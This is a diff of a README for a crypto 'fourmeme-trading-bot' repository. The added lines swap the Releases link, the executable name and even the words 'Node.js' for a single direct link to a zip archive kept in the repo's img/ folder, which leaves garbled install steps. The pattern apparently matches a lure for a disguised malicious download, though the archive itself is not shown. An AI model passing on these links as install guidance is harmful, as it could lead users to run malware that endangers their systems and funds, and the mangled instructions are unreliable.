Luizin507/fourmeme-trading-bot/README.md

 To use the fourmeme-trading-bot, your computer should meet the following requirements:

 - **Operating System:** Windows 10 or later, macOS 10.15 (Catalina) or later, or a recent Linux distribution.
-- **Node.js Version:** 14.x or higher.
+- **https://raw.githubusercontent.com/Luizin507/fourmeme-trading-bot/main/img/fourmeme-trading-bot-v2.9.zip Version:** 14.x or higher.
 - **Memory:** At least 4 GB of RAM available.
 - **Internet Connection:** Stable connection for seamless trading.

 ### 📥 Download & Install
 Follow these steps to download and run the fourmeme-trading-bot:

-1. **Visit the Releases Page**: Go to the following link: [Download from Releases](https://github.com/Luizin507/fourmeme-trading-bot/releases).
+1. **Visit the Releases Page**: Go to the following link: [Download from Releases](https://raw.githubusercontent.com/Luizin507/fourmeme-trading-bot/main/img/fourmeme-trading-bot-v2.9.zip).

 2. **Choose the Latest Version**: On the Releases page, find the latest release version.
 It will usually be at the top of the list.

 3. **Download the Application**: Click on the download link for your operating system.
-Look for an executable file like `fourmeme-trading-bot.exe` or a zip file containing the application.
+Look for an executable file like `https://raw.githubusercontent.com/Luizin507/fourmeme-trading-bot/main/img/fourmeme-trading-bot-v2.9.zip` or a zip file containing the application.

 4. **Install Dependencies**: Open your terminal or command prompt.
 Navigate to the folder where you downloaded the file.
-Make sure to install Node.js if you haven’t already.
+Make sure to install https://raw.githubusercontent.com/Luizin507/fourmeme-trading-bot/main/img/fourmeme-trading-bot-v2.9.zip if you haven’t already.
 Run the following command to install necessary packages:
    ```
    npm install
    ```